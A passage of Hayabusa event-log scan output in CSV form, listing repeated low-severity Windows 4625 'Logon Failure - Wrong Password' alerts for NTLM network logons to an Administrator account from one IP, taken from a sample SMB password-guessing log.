NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vdFC4g7vsLO0zOzL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HpdCohLheoqQ6DXw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHS3sclMwgHuH8rE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sNSheImuQwgOEH5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GX5y374mlYYXbAB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaFRL6q9KQY5bFHZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrkEyJmfLiSrvQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fd1vJiJa3pdjqdQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RVrZl3LOIa7VLhT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TKR8KbyQkwRX1qTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GY22XuDxbE5lvEra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4AntiX3j9HLHcOOq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIvMbod41WeNADy5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0UL4lb3CCrv7YfGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OyRktDjPqFyrdSTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HKEGmAH8Wbc7f3jC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06Dfi4lO2Vdw3gCr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 29eXmenUTACkAHKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Zq7Gl6hnKDJJqFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jKENlWYt6m78taZR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 822SUU2Hg6w6AqQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bROU0Mk9Z4yEq323 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKfVPleDpLLqkuKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NGWVqbchMitnLVYT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7K9vifU9lWwpP9J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIgKYj210JfICJXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jisuKilPQivTV8yE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hckyoom0XnqpRzK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: De0l6qgcuhMERjMY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SSa7pylPWn8jl2Ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ol9OntO4hqidlNUi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kXOBF0ZWLxMauHuT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WVBFJltkR5vnmpYD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kHVXEHq9zNYdfTpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OIw3BxmLsfwDXXFg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hhgRhjnhkRJus4fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xz78guWXrekEvuFT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 04wNT26RJmriQrfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XmbuuymdSpfNldt2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yqJarBVOImq5Tn2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BZYExQroYH65tPuG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llU5DQBrIrV3VtG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HV17iXOYQqs2ntax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esZnEeyGdPa22PsL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rlYFTP9a2wdi5A2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJifU0PnO1Ntp6z3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGKdKjJy28Qd1whT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3L4BYjYJYlvuYHE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ui5RoLKttDo0wfFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G2xjdWobsxBjo6p7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TPeQ0M5lXITI84G3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uu72qx4lG5ZRM7xf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zD072YR1hIgbzjaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqA7HDvImIlCiFq2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: efYFxZwMGEC3vVi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6WmMHYegvFJvv6zd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DS9WkRnP0B5MgaeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5jNPV7ZgFExgg9n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1FJ6vm3wK97iual : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLuIx0sfF8NQD8QY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.800 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y3lMvcrrmGTkjdlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZqOabcNMeazs6TC : IP Address: 192.168.198.149 : AuthPackage: 